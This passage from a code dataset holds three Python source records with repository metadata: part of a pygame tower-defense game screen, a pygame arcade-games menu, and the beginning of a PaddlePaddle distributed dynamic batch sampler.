71),\n starting_layer_height=1,\n manager=self.ui_manager,\n object_id=\"time-pnl\"\n )\n\n wave_pnl = gui.GUI.Panel(\n relative_rect=pg.Rect(150, 20, 110, 71),\n starting_layer_height=1,\n manager=self.ui_manager,\n object_id=\"wave-pnl\"\n )\n\n health_pnl = gui.GUI.Panel(\n relative_rect=pg.Rect(20, 120, 243, 71),\n starting_layer_height=1,\n manager=self.ui_manager,\n object_id=\"health-pnl\"\n )\n\n self.panels.update({\"shop-pnl\": shop_pnl})\n self.panels.update({\"time-pnl\": time_pnl})\n self.panels.update({\"wave-pnl\": wave_pnl})\n self.panels.update({\"health-pnl\": health_pnl})\n\n def button_init(self):\n '''\n Init method of all game screen GUI buttons\n '''\n '''\n Метод инициализации всех кнопок ГПИ игрового экрана\n '''\n\n pause_btn = gui.GUI.Button(\n relative_rect=pg.Rect(20, 660, 241, 60),\n text=\"\",\n manager=self.ui_manager,\n tool_tip_text=\"Click to pause\",\n object_id=\"pause-btn\"\n )\n\n shop_container = self.panels[\"shop-pnl\"].get_container()\n\n buy_archer_btn = gui.GUI.Button(\n relative_rect=pg.Rect(9, 50,\n 104, 130),\n text=\"\",\n manager=self.ui_manager,\n container=shop_container,\n tool_tip_text=\"Buy Archer tower\",\n object_id=\"buy-ARCHER-btn\"\n )\n\n buy_minigun_btn = gui.GUI.Button(\n relative_rect=pg.Rect(128, 50,\n 104, 130),\n text=\"\",\n manager=self.ui_manager,\n container=shop_container,\n tool_tip_text=\"Buy Minigun tower\",\n object_id=\"buy-MINIGUN-btn\"\n )\n\n buy_tank_btn = gui.GUI.Button(\n relative_rect=pg.Rect(9, 190,\n 104, 130),\n text=\"\",\n manager=self.ui_manager,\n container=shop_container,\n tool_tip_text=\"Buy Tank tower\",\n object_id=\"buy-TANK-btn\"\n )\n\n sell_btn = gui.GUI.Button(\n relative_rect=pg.Rect(128, 190, 104, 130),\n text=\"\",\n manager=self.ui_manager,\n container=shop_container,\n tool_tip_text=\"Sell tower\",\n object_id=\"sell-btn\"\n )\n\n cancel_btn = gui.GUI.Button(\n relative_rect=pg.Rect(20, 575, 241, 60),\n text=\"\",\n manager=self.ui_manager,\n visible=False,\n tool_tip_text=\"Click to cancel\",\n object_id=\"cancel-btn\"\n )\n\n self.buttons.update({\"pause-btn\": pause_btn})\n self.buttons.update({\"buy-archer-btn\": buy_archer_btn})\n self.buttons.update({\"buy-minigun-btn\": buy_minigun_btn})\n self.buttons.update({\"buy-tank-btn\": buy_tank_btn})\n self.buttons.update({\"sell-btn\": sell_btn})\n self.buttons.update({\"cancel-btn\": cancel_btn})\n\n def label_init(self):\n '''\n Init method of all game screen GUI labels (including linked labels)\n '''\n '''\n Метод инициализации все надписей ГПИ игрового экрана\n (в том числе связанных)\n '''\n\n time_container = self.panels[\"time-pnl\"].get_container()\n wave_container = self.panels[\"wave-pnl\"].get_container()\n health_container = self.panels[\"health-pnl\"].get_container()\n shop_container = self.panels[\"shop-pnl\"].get_container()\n\n time_lbl = gui.GUI.Label(\n relative_rect=pg.Rect(10, 40, 90, 25),\n text=\"\",\n manager=self.ui_manager,\n container=time_container,\n object_id=\"time-lbl\"\n )\n\n def decor(func):\n def core():\n time = int(func())\n secs = time % 60\n mins = time // 60\n return f\"{mins:02d}:{secs:02d}\"\n return core\n time_update = decor(self.game_section.get_model_time)\n time_linlbl = gui.GUI.LinkedLabel(time_lbl, time_update)\n\n money_lbl = gui.GUI.Label(\n relative_rect=pg.Rect(127, 18, 110, 25),\n text=\"\",\n manager=self.ui_manager,\n container=shop_container,\n object_id=\"money-lbl\"\n )\n\n def decor(func):\n def core():\n money = func()\n return f\"{money:05d}\"\n return core\n money_update = decor(self.game_section.get_model_money)\n money_linlbl = gui.GUI.LinkedLabel(money_lbl, money_update)\n\n wave_lbl = gui.GUI.Label(\n relative_rect=pg.Rect(10, 40, 90, 25),\n text=\"\",\n manager=self.ui_manager,\n container=wave_container,\n object_id=\"wave-lbl\"\n )\n\n def decor(func):\n def core():\n curr, full = func()\n return f\"{curr}/{full}\"\n return core\n wave_update = decor(self.game_section.get_model_wave)\n wave_linlbl = gui.GUI.LinkedLabel(wave_lbl, wave_update)\n\n health_lbl = gui.GUI.Label(\n relative_rect=pg.Rect(110, 10, 125, 50),\n text=\"\",\n manager=self.ui_manager,\n container=health_container,\n object_id=\"health-lbl\"\n )\n\n def decor(func):\n def core():\n curr, full = func()\n return f\"{curr} / {full}\"\n return core\n health_update = decor(self.game_section.get_model_base_health)\n health_linlbl = gui.GUI.LinkedLabel(health_lbl, health_update)\n\n self.linked_labels.update({\"time-lbl\": time_linlbl})\n self.linked_labels.update({\"money-lbl\": money_linlbl})\n self.linked_labels.update({\"wave-lbl\": wave_linlbl})\n self.linked_labels.update({\"health-lbl\": health_linlbl})\n\n def button_handling(self, event):\n '''\n Method for proccessing of button related events\n :param event: button related pygame event,\n start menu gui should proccess\n '''\n '''\n Метод, обрабатывающий события кнопок\n :param event: pygame event связанный с кнопками,\n которое ГПИ главного меню должен обработать\n '''\n\n if event.user_type == pg_gui.UI_BUTTON_PRESSED:\n if event.ui_object_id == \"pause-btn\":\n self.game_section.unplug()\n pause_menu.PauseMenu(self.game_section.ms_event_manager,\n self.game_section.ms_visual_manager,\n self.game_section)\n\n elif re.search(r\"shop-pnl\\.#panel_container\\..*-btn\",\n event.ui_object_id):\n self.shop_btn_handle(event)\n\n elif event.ui_object_id == \"buy-plc-btn\":\n self.buy_plc_btn_handle(event)\n\n elif event.ui_object_id == \"sell-plc-btn\":\n self.sell_plc_btn_handle(event)\n\n elif event.ui_object_id == \"cancel-btn\":\n self.buttons['buy-archer-btn'].enable()\n self.buttons['buy-minigun-btn'].enable()\n self.buttons['buy-tank-btn'].enable()\n self.buttons['sell-btn'].enable()\n self.buttons[\"cancel-btn\"].hide()\n buttons_to_del = []\n for name in self.buttons:\n if (re.search(\"buy-plc-*\", name) is not None\n or re.search(\"sell-plc-*\", name) is not None):\n buttons_to_del.append(name)\n\n for name in buttons_to_del:\n self.remove_element(name)\n\n def shop_btn_handle(self, event):\n if re.search(r\"shop-pnl\\.#panel_container\\.buy-.*-btn\",\n event.ui_object_id):\n\n tower_type = re.search(r\"shop-pnl\\.#panel_container\\.\"\n r\"buy-(.*)-btn\",\n event.ui_object_id).group(1)\n model_wrap = self.game_section.model_wrap\n free_space = model_wrap.get_free_space(tower_type)\n\n if len(free_space) > 0:\n self.buttons['buy-archer-btn'].disable()\n self.buttons['buy-minigun-btn'].disable()\n self.buttons['buy-tank-btn'].disable()\n self.buttons['sell-btn'].disable()\n self.buttons[\"cancel-btn\"].show()\n\n for i in range(len(free_space)):\n button_rect = pg.Rect(0, 0, 70, 70)\n button_rect.center = free_space[i]\n plc_btn = gui.GUI.Button(\n relative_rect=button_rect,\n text=\"\",\n manager=self.ui_manager,\n tool_tip_text=\"Click to confirm\",\n object_id=\"buy-plc-btn\"\n )\n self.buttons.update({f\"buy-plc-{i}\": plc_btn})\n\n elif event.ui_object_id == \"shop-pnl.#panel_container.sell-btn\":\n model_wrap = self.game_section.model_wrap\n occupied_space = model_wrap.get_occupied_space()\n\n if len(occupied_space) > 0:\n self.buttons['buy-archer-btn'].disable()\n self.buttons['buy-minigun-btn'].disable()\n self.buttons['buy-tank-btn'].disable()\n self.buttons['sell-btn'].disable()\n self.buttons[\"cancel-btn\"].show()\n\n for i in range(len(occupied_space)):\n button_rect = pg.Rect(0, 0, 70, 70)\n button_rect.center = occupied_space[i]\n plc_btn = gui.GUI.Button(\n relative_rect=button_rect,\n text=\"\",\n manager=self.ui_manager,\n tool_tip_text=\"Click to confirm\",\n object_id=\"sell-plc-btn\"\n )\n self.buttons.update({f\"sell-plc-{i}\": plc_btn})\n\n def buy_plc_btn_handle(self, event):\n self.buttons['buy-archer-btn'].enable()\n self.buttons['buy-minigun-btn'].enable()\n self.buttons['buy-tank-btn'].enable()\n self.buttons['sell-btn'].enable()\n self.buttons[\"cancel-btn\"].hide()\n\n model_wrap = self.game_section.model_wrap\n tower_type = model_wrap.selected_tower_type\n pos = list(event.ui_element.get_relative_rect().center)\n\n buy_msg = mod_wp.ModelWrap.BUY_TOWER(tower_type, pos,\n address=model_wrap)\n self.event_manager.post(buy_msg)\n\n buttons_to_del = []\n for name in self.buttons:\n if re.search(\"buy-plc-*\", name):\n buttons_to_del.append(name)\n\n for name in buttons_to_del:\n self.remove_element(name)\n\n def sell_plc_btn_handle(self, event):\n self.buttons['buy-archer-btn'].enable()\n self.buttons['buy-minigun-btn'].enable()\n self.buttons['buy-tank-btn'].enable()\n self.buttons['sell-btn'].enable()\n self.buttons[\"cancel-btn\"].hide()\n\n model_wrap = self.game_section.model_wrap\n pos = list(event.ui_element.get_relative_rect().center)\n\n sell_msg = mod_wp.ModelWrap.SELL_TOWER(pos,\n address=model_wrap)\n self.event_manager.post(sell_msg)\n\n buttons_to_del = []\n for name in self.buttons:\n if re.search(\"sell-plc-*\", name):\n buttons_to_del.append(name)\n\n for name in buttons_to_del:\n self.remove_element(name)\n\n\nclass GameScreen(gm_sect.GameSection):\n '''\n Class of the game screen\n '''\n '''\n Класс меню выбора уровня\n '''\n\n def __init__(self, ms_event_manager, ms_visual_manager, lvl_path):\n '''\n Init method of the game screen\n :param ms_event_manager: link to the master event manager\n :param ms_visual_manager: link to the master visual manager\n :param lvl_path: path str to the level folder\n '''\n '''\n Метод инициализации игровой экран\n :param ms_event_manager: ссылка на главного обработчика событий\n :param ms_visual_manager: ссылка на главный холст\n :param lvl_path: строка с путем до папки с уровнем\n '''\n\n super().__init__(ms_event_manager, ms_visual_manager, GameScreenGUI)\n self.model_wrap = mod_wp.ModelWrap(self.event_manager, self.canvas,\n self, lvl_path)\n\n def get_model_time(self):\n '''\n Method that wraps the model_wrap.clock.get_time()\n '''\n '''\n Метод обертка для метода model_wrap.clock.get_time()\n '''\n\n return self.model_wrap.clock.get_time()\n\n def get_model_money(self):\n '''\n Method that wraps the model_wrap.get_money()\n '''\n '''\n Метод обертка для метода model_wrap.get_money()\n '''\n\n return self.model_wrap.get_money()\n\n def get_model_wave(self):\n '''\n Method that wraps the model_wrap.get_wave()\n '''\n '''\n Метод обертка для метода model_wrap.get_wave()\n '''\n\n return self.model_wrap.get_wave()\n\n def get_model_base_health(self):\n '''\n Method that wraps the model_wrap.get_base_health()\n '''\n '''\n Метод обертка для метода model_wrap.get_base_health()\n '''\n\n return self.model_wrap.get_base_health()\n\n def end_game(self, win_flag):\n self.unplug()\n end_game_screen.EndGameScreen(self.ms_event_manager,\n self.ms_visual_manager,\n win_flag)\n", "repo_name": "SenpaiKirigaia/AAA-Tower-defense", "sub_path": "game_sections/game_screen.py", "file_name": "game_screen.py", "file_ext": "py", "file_size_in_byte": 18534, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "arch.gui.GUI", "line_number": 11, "usage_type": "attribute"}, {"api_name": "arch.gui", "line_number": 11, "usage_type": "name"}, {"api_name": "arch.gui.GUI.Panel", "line_number": 49, "usage_type": "call"}, {"api_name": "arch.gui.GUI", "line_number": 49, "usage_type": "attribute"}, {"api_name": "arch.gui", "line_number": 49, "usage_type": "name"}, {"api_name": "pygame.Rect", "line_number": 50, "usage_type": "call"}, {"api_name": "arch.gui.GUI.Panel", "line_number": 56, "usage_type": "call"}, {"api_name": "arch.gui.GUI", "line_number": 56, "usage_type": "attribute"}, {"api_name": "arch.gui", "line_number": 56, "usage_type": "name"}, {"api_name": "pygame.Rect", "line_number": 57, "usage_type": "call"}, {"api_name": "arch.gui.GUI.Panel", "line_number": 63, "usage_type": "call"}, {"api_name": "arch.gui.GUI", "line_number": 63, "usage_type": "attribute"}, {"api_name": "arch.gui", "line_number": 63, "usage_type": "name"}, {"api_name": "pygame.Rect", "line_number": 64, "usage_type": "call"}, {"api_name": "arch.gui.GUI.Panel", "line_number": 70, "usage_type": "call"}, {"api_name": "arch.gui.GUI", "line_number": 70, "usage_type": "attribute"}, {"api_name": "arch.gui", "line_number": 70, "usage_type": "name"}, {"api_name": "pygame.Rect", "line_number": 71, "usage_type": "call"}, {"api_name": "arch.gui.GUI.Button", "line_number": 90, "usage_type": "call"}, {"api_name": "arch.gui.GUI", "line_number": 90, "usage_type": "attribute"}, {"api_name": "arch.gui", "line_number": 90, "usage_type": "name"}, {"api_name": "pygame.Rect", "line_number": 91, "usage_type": "call"}, {"api_name": "arch.gui.GUI.Button", "line_number": 100, "usage_type": "call"}, {"api_name": "arch.gui.GUI", "line_number": 100, "usage_type": "attribute"}, {"api_name": "arch.gui", "line_number": 100, "usage_type": "name"}, {"api_name": "pygame.Rect", "line_number": 101, "usage_type": "call"}, {"api_name": "arch.gui.GUI.Button", "line_number": 110, "usage_type": "call"}, {"api_name": "arch.gui.GUI", "line_number": 110, "usage_type": "attribute"}, {"api_name": "arch.gui", "line_number": 110, "usage_type": "name"}, {"api_name": "pygame.Rect", "line_number": 111, "usage_type": "call"}, {"api_name": "arch.gui.GUI.Button", "line_number": 120, "usage_type": "call"}, {"api_name": "arch.gui.GUI", "line_number": 120, "usage_type": "attribute"}, {"api_name": "arch.gui", "line_number": 120, "usage_type": "name"}, {"api_name": "pygame.Rect", "line_number": 121, "usage_type": "call"}, {"api_name": "arch.gui.GUI.Button", "line_number": 130, "usage_type": "call"}, {"api_name": "arch.gui.GUI", "line_number": 130, "usage_type": "attribute"}, {"api_name": "arch.gui", "line_number": 130, "usage_type": "name"}, {"api_name": "pygame.Rect", "line_number": 131, "usage_type": "call"}, {"api_name": "arch.gui.GUI.Button", "line_number": 139, "usage_type": "call"}, {"api_name": "arch.gui.GUI", "line_number": 139, "usage_type": "attribute"}, {"api_name": "arch.gui", "line_number": 139, "usage_type": "name"}, {"api_name": "pygame.Rect", "line_number": 140, "usage_type": "call"}, {"api_name": "arch.gui.GUI.Label", "line_number": 169, "usage_type": "call"}, {"api_name": "arch.gui.GUI", "line_number": 169, "usage_type": "attribute"}, {"api_name": "arch.gui", "line_number": 169, "usage_type": "name"}, {"api_name": "pygame.Rect", "line_number": 170, "usage_type": "call"}, {"api_name": "arch.gui.GUI.LinkedLabel", "line_number": 185, "usage_type": "call"}, {"api_name": "arch.gui.GUI", "line_number": 185, "usage_type": "attribute"}, {"api_name": "arch.gui", "line_number": 185, "usage_type": "name"}, {"api_name": "arch.gui.GUI.Label", "line_number": 187, "usage_type": "call"}, {"api_name": "arch.gui.GUI", "line_number": 187, "usage_type": "attribute"}, {"api_name": "arch.gui", "line_number": 187, "usage_type": "name"}, {"api_name": "pygame.Rect", "line_number": 188, "usage_type": "call"}, {"api_name": "arch.gui.GUI.LinkedLabel", "line_number": 201, "usage_type": "call"}, {"api_name": "arch.gui.GUI", "line_number": 201, "usage_type": "attribute"}, {"api_name": "arch.gui", "line_number": 201, "usage_type": "name"}, {"api_name": "arch.gui.GUI.Label", "line_number": 203, "usage_type": "call"}, {"api_name": "arch.gui.GUI", "line_number": 203, "usage_type": "attribute"}, {"api_name": "arch.gui", "line_number": 203, "usage_type": "name"}, {"api_name": "pygame.Rect", "line_number": 204, "usage_type": "call"}, {"api_name": "arch.gui.GUI.LinkedLabel", "line_number": 217, "usage_type": "call"}, {"api_name": "arch.gui.GUI", "line_number": 217, "usage_type": "attribute"}, {"api_name": "arch.gui", "line_number": 217, "usage_type": "name"}, {"api_name": "arch.gui.GUI.Label", "line_number": 219, "usage_type": "call"}, {"api_name": "arch.gui.GUI", "line_number": 219, "usage_type": "attribute"}, {"api_name": "arch.gui", "line_number": 219, "usage_type": "name"}, {"api_name": "pygame.Rect", "line_number": 220, "usage_type": "call"}, {"api_name": "arch.gui.GUI.LinkedLabel", "line_number": 233, "usage_type": "call"}, {"api_name": "arch.gui.GUI", "line_number": 233, "usage_type": "attribute"}, {"api_name": "arch.gui", "line_number": 233, "usage_type": "name"}, {"api_name": "pygame_gui.UI_BUTTON_PRESSED", "line_number": 252, "usage_type": "attribute"}, {"api_name": "game_sections.pause_menu.PauseMenu", "line_number": 255, "usage_type": "call"}, {"api_name": "game_sections.pause_menu", "line_number": 255, "usage_type": "name"}, {"api_name": "re.search", "line_number": 259, "usage_type": "call"}, {"api_name": "re.search", "line_number": 277, "usage_type": "call"}, {"api_name": "re.search", "line_number": 278, "usage_type": "call"}, {"api_name": "re.search", "line_number": 285, "usage_type": "call"}, {"api_name": "re.search", "line_number": 288, "usage_type": "call"}, {"api_name": "pygame.Rect", "line_number": 302, "usage_type": "call"}, {"api_name": "arch.gui.GUI.Button", "line_number": 304, "usage_type": "call"}, {"api_name": "arch.gui.GUI", "line_number": 304, "usage_type": "attribute"}, {"api_name": "arch.gui", "line_number": 304, "usage_type": "name"}, {"api_name": "pygame.Rect", "line_number": 325, "usage_type": "call"}, {"api_name": "arch.gui.GUI.Button", "line_number": 327, "usage_type": "call"}, {"api_name": "arch.gui.GUI", "line_number": 327, "usage_type": "attribute"}, {"api_name": "arch.gui", "line_number": 327, "usage_type": "name"}, {"api_name": "arch.model_wrap.ModelWrap.BUY_TOWER", "line_number": 347, "usage_type": "call"}, {"api_name": "arch.model_wrap.ModelWrap", "line_number": 347, "usage_type": "attribute"}, {"api_name": "arch.model_wrap", "line_number": 347, "usage_type": "name"}, {"api_name": "re.search", "line_number": 353, "usage_type": "call"}, {"api_name": "arch.model_wrap.ModelWrap.SELL_TOWER", "line_number": 369, "usage_type": "call"}, {"api_name": "arch.model_wrap.ModelWrap", "line_number": 369, "usage_type": "attribute"}, {"api_name": "arch.model_wrap", "line_number": 369, "usage_type": "name"}, {"api_name": "re.search", "line_number": 375, "usage_type": "call"}, {"api_name": "arch.game_section.GameSection", "line_number": 382, "usage_type": "attribute"}, {"api_name": "arch.game_section", "line_number": 382, "usage_type": "name"}, {"api_name": "arch.model_wrap.ModelWrap", "line_number": 405, "usage_type": "call"}, {"api_name": "arch.model_wrap", "line_number": 405, "usage_type": "name"}, {"api_name": "game_sections.end_game_screen.EndGameScreen", "line_number": 450, "usage_type": "call"}, {"api_name": "game_sections.end_game_screen", "line_number": 450, "usage_type": "name"}]}
+{"seq_id": "21164173456", "text": "import button\nimport pygame\npygame.init()\n# Load images\ngrass = pygame.image.load(\"graassland.png\")\nicon = pygame.image.load(\"cow.png\")\n# setup display\nWIDTH,HEIGHT= 700,700\n\nWIN=pygame.display.set_mode((WIDTH,HEIGHT),pygame.RESIZABLE)\npygame.display.set_caption(\"ARCADE GAMES\")\n\npygame.display.set_icon(icon)\n\n#colors\nCORAL = (255,127,80)\nTOMATO = (255,99,71)\nWHITE = (255,255,255)\n#fonts\nFONTS = pygame.font.SysFont('comicsans',20)\npygame.transform.smoothscale(grass,(WIDTH,HEIGHT))\n# Setup GameLoop\nclock = pygame.time.Clock()\nrun = True\nFPS=60\n#create button object\nmybutton1 = button.Button(grass,(WIDTH/2),((HEIGHT-200)/4),200,40,CORAL,TOMATO,\"CONNECT 4\",WHITE, FONTS)\nmybutton2 = button.Button(grass,(WIDTH/2),((HEIGHT-200)/4*2),200,40,CORAL,TOMATO,\"COWS AND BULLS\",WHITE, FONTS)\nmybutton3 = button.Button(grass,(WIDTH/2),((HEIGHT-200)/4*3),200,40,CORAL,TOMATO,\"HANGMAN\",WHITE, FONTS)\nmybutton4 = button.Button(grass,(WIDTH/2),((HEIGHT-200)),200,40,CORAL,TOMATO,\"FLOOD IT\",WHITE, FONTS)\nwhile run:\n clock.tick(FPS)\n WIN.blit(grass,(0,0))\n x,y = pygame.mouse.get_pos()\n mybutton1.draw(x,y)\n mybutton2.draw(x,y)\n mybutton3.draw(x,y)\n mybutton4.draw(x,y)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n run = False\n if event.type == pygame.MOUSEBUTTONDOWN:\n click_x,click_y = pygame.mouse.get_pos()\n \n if mybutton1.action(click_x,click_y):\n import Connect4\n WIN=pygame.display.set_mode((WIDTH,HEIGHT),pygame.RESIZABLE)\n pygame.display.set_caption(\"ARCADE GAMES\")\n pygame.display.set_icon(icon)\n\n if mybutton2.action(click_x,click_y):\n import COW\n WIN=pygame.display.set_mode((WIDTH,HEIGHT),pygame.RESIZABLE)\n pygame.display.set_caption(\"ARCADE GAMES\")\n pygame.display.set_icon(icon)\n if mybutton3.action(click_x,click_y):\n from Hangman import hangman\n WIN=pygame.display.set_mode((WIDTH,HEIGHT),pygame.RESIZABLE)\n pygame.display.set_caption(\"ARCADE GAMES\")\n pygame.display.set_icon(icon)\n if mybutton4.action(click_x,click_y):\n from FloodIT import Flood_It\n WIN=pygame.display.set_mode((WIDTH,HEIGHT),pygame.RESIZABLE)\n pygame.display.set_caption(\"ARCADE GAMES\")\n pygame.display.set_icon(icon)\n pygame.display.update()\n\n\npygame.quit()\n ", "repo_name": "Saksham-13/CowandBull", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 2521, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pygame.init", "line_number": 3, "usage_type": "call"}, {"api_name": "pygame.image.load", "line_number": 5, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 5, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 6, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 6, "usage_type": "attribute"}, {"api_name": "pygame.display.set_mode", "line_number": 10, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 10, "usage_type": "attribute"}, {"api_name": "pygame.RESIZABLE", "line_number": 10, "usage_type": "attribute"}, {"api_name": "pygame.display.set_caption", "line_number": 11, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 11, "usage_type": "attribute"}, {"api_name": "pygame.display.set_icon", "line_number": 13, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 13, "usage_type": "attribute"}, {"api_name": "pygame.font.SysFont", "line_number": 20, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 20, "usage_type": "attribute"}, {"api_name": "pygame.transform.smoothscale", "line_number": 21, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 21, "usage_type": "attribute"}, {"api_name": "pygame.time.Clock", "line_number": 23, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 23, "usage_type": "attribute"}, {"api_name": "button.Button", "line_number": 27, "usage_type": "call"}, {"api_name": "button.Button", "line_number": 28, "usage_type": "call"}, {"api_name": "button.Button", "line_number": 29, "usage_type": "call"}, {"api_name": "button.Button", "line_number": 30, "usage_type": "call"}, {"api_name": "pygame.mouse.get_pos", "line_number": 34, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 34, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 39, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 39, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 40, "usage_type": "attribute"}, {"api_name": "pygame.MOUSEBUTTONDOWN", "line_number": 42, "usage_type": "attribute"}, {"api_name": "pygame.mouse.get_pos", "line_number": 43, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 43, "usage_type": "attribute"}, {"api_name": "pygame.display.set_mode", "line_number": 47, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 47, "usage_type": "attribute"}, {"api_name": "pygame.RESIZABLE", "line_number": 47, "usage_type": "attribute"}, {"api_name": "pygame.display.set_caption", "line_number": 48, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 48, "usage_type": "attribute"}, {"api_name": "pygame.display.set_icon", "line_number": 49, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 49, "usage_type": "attribute"}, {"api_name": "pygame.display.set_mode", "line_number": 53, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 53, "usage_type": "attribute"}, {"api_name": "pygame.RESIZABLE", "line_number": 53, "usage_type": "attribute"}, {"api_name": "pygame.display.set_caption", "line_number": 54, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 54, "usage_type": "attribute"}, {"api_name": "pygame.display.set_icon", "line_number": 55, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 55, "usage_type": "attribute"}, {"api_name": "pygame.display.set_mode", "line_number": 58, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 58, "usage_type": "attribute"}, {"api_name": "pygame.RESIZABLE", "line_number": 58, "usage_type": "attribute"}, {"api_name": "pygame.display.set_caption", "line_number": 59, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 59, "usage_type": "attribute"}, {"api_name": "pygame.display.set_icon", "line_number": 60, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 60, "usage_type": "attribute"}, {"api_name": "pygame.display.set_mode", "line_number": 63, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 63, "usage_type": "attribute"}, {"api_name": "pygame.RESIZABLE", "line_number": 63, "usage_type": "attribute"}, {"api_name": "pygame.display.set_caption", "line_number": 64, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 64, "usage_type": "attribute"}, {"api_name": "pygame.display.set_icon", "line_number": 65, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 65, "usage_type": "attribute"}, {"api_name": "pygame.display.update", "line_number": 66, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 66, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 69, "usage_type": "call"}]}
+{"seq_id": "39627026158", "text": "import math\nimport numpy as np\nfrom paddle.io import BatchSampler\nfrom .data_utils import ordered_indices, num_tokens_vec_fn, get_batches_indices\n\nclass DistributedDynamicBatchSampler(BatchSampler):\n ''' 支持多卡训练的动态bsz采样器,与fairseq对齐。 10/2\n '''\n def __init__(self,\n dataset,\n mode='train',\n has_target=False,\n max_tokens=4000,\n max_sentences=None,\n bsz_factor=1,\n seed=1,\n num_replicas=None,\n rank=None,\n drop_last=False):\n self.dataset = dataset\n assert mode in ['train', 'dev', 'test']\n self.shuffle = mode == 'train'\n self.src_sizes = np.array([len(data[0])+1 for data in dataset])\n self.tgt_sizes = np.array([len(data[1])+1 for data in dataset]) if mode != 'test' or has_target else None\n # self.num_tokens_fn = lambda idx:self.dataset[idx]+1 # 长度dset,一定要加eos或sos!!\n assert max_tokens is not None or max_sentences is not None, \\\n \"max_tokens and max_sentences should not be null at the same time, please specify one parameter at least\"\n self.max_tokens = max_tokens\n self.max_sentences = max_sentences\n assert isinstance(bsz_factor, int) and bsz_factor > 0, \\\n \"bsz_factor should be a positive integer\"\n self.bsz_factor = bsz_factor\n self.common_seed=seed\n from paddle.fluid.dygraph.parallel import ParallelEnv\n if num_replicas is not None:\n assert isinstance(num_replicas, int) and num_replicas > 0, \\\n \"num_replicas should be a positive integer\"\n self.nranks = num_replicas\n else:\n self.nranks = ParallelEnv().nranks\n\n if rank is not None:\n assert isinstance(rank, int) and rank >= 0, \\\n \"rank should be a non-negative integer\"\n self.local_rank = rank\n else:\n self.local_rank = ParallelEnv().local_rank\n assert isinstance(drop_last, bool), \\\n \"drop_last should be a boolean number\"\n self.drop_last = drop_last # 如果多余了就不变,bool不变,然后删除最后一个;如果没多余\n self.epoch = 1 # we use 1-based indexing for epochs\n\n # get indices and shuffle samples (only calc once)\n indices = ordered_indices(src_sizes=self.src_sizes, tgt_sizes=self.tgt_sizes,\n common_seed=self.common_seed,shuffle=self.shuffle)\n # get batches indices and subsample for rank\n self._frozen_batches = self._get_batches_by_max_tokens(indices)\n\n def __iter__(self):\n # get batches_indices shuffled by epoch+seed\n prev_epoch = self.epoch\n self.epoch+=1\n seed=self.common_seed + prev_epoch\n batches_indices=self._get_batches_for_epoch(seed=seed,shuffle=self.shuffle)\n _batch_iter = iter(batches_indices)\n\n for batch_indices in _batch_iter:\n yield batch_indices\n\n def __len__(self):\n return len(self._frozen_batches)\n\n def _get_batches_for_epoch(self, seed, shuffle):\n batches = self._frozen_batches.copy()\n if shuffle:\n np.random.RandomState(seed=seed).shuffle(batches) # 无返回值\n return batches\n\n def set_epoch(self, epoch):\n '''\n Sets the epoch number. When :attr:`shuffle=True`, this number is used\n as seeds of random numbers. By default, users may not set this, all\n replicas (workers) use a different random ordering for each epoch.\n If set same number at each epoch, this sampler will yield the same\n ordering at all epoches.\n '''\n self.epoch = epoch\n\n def _get_batches_by_max_tokens(self, indices):\n ''' get shard data by rank,no shuffle '''\n num_tokens_vec = num_tokens_vec_fn(indices, self.src_sizes, self.tgt_sizes)\n batches_indices = get_batches_indices(indices,\n num_tokens_vec=num_tokens_vec,\n max_tokens=self.max_tokens,\n max_sentences=self.max_sentences,\n bsz_factor=self.bsz_factor)\n\n # process last batch\n if self.drop_last and len(batches_indices[-1]) % self.bsz_factor != 0:\n batches_indices.pop()\n\n # subsample batches_indices for ranks\n if self.nranks > 1:\n local_batches_indices = []\n last_batches = len(batches_indices) % self.nranks # 多余的batch\n # 补全batches\n if last_batches > 0:\n batches_indices.extend(batches_indices[:(self.nranks - last_batches)])\n assert len(batches_indices) % self.nranks == 0 # 确保batch数是nrank的倍数\n\n # sabsample for each process\n for i in range(0, len(batches_indices), self.nranks):\n local_batches_indices.append(batches_indices[i])\n return local_batches_indices\n # single process\n return batches_indices", "repo_name": "jiaohuix/PaddleSeq", "sub_path": "paddleseq/reader/sampler.py", "file_name": "sampler.py", "file_ext": "py", "file_size_in_byte": 5176, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 10, "dataset": "github-code", "pt": "53", "api": [{"api_name": "paddle.io.BatchSampler", "line_number": 6, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 24, "usage_type": "call"}, {"api_name": "paddle.fluid.dygraph.parallel.ParallelEnv", "line_number": 40, "usage_type": "call"}, {"api_name": "paddle.fluid.dygraph.parallel.ParallelEnv", 